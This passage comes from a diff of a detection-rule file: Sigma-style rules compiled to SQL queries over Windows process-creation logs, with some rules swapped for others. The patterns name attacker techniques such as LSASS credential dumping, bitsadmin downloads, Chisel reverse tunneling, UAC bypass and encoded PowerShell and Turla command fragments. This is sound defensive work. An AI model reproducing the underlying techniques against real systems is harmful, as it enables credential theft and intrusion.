processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Legitimate setups that use similar flags" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "status": "experimental", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", - "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "status": "experimental", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "status": "experimental", + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "status": "test", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", - "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "status": "test", - "description": "Detects new commands that add new printer port which point to suspicious file", - "author": "EagleEye Team, Florian Roth", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_1048.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", - "status": "test", - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Boot Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "title": "PUA - RunXCmd Execution", + "id": "93199800-b52a-4dec-b762-75212c196542", "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" - ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ + "attack.t1112", "attack.defense_evasion" ], "falsepositives": [ @@ -10729,497 +10347,529 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", - "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "status": "test", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", "attack.execution", - "attack.t1569.002" - ], - "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - 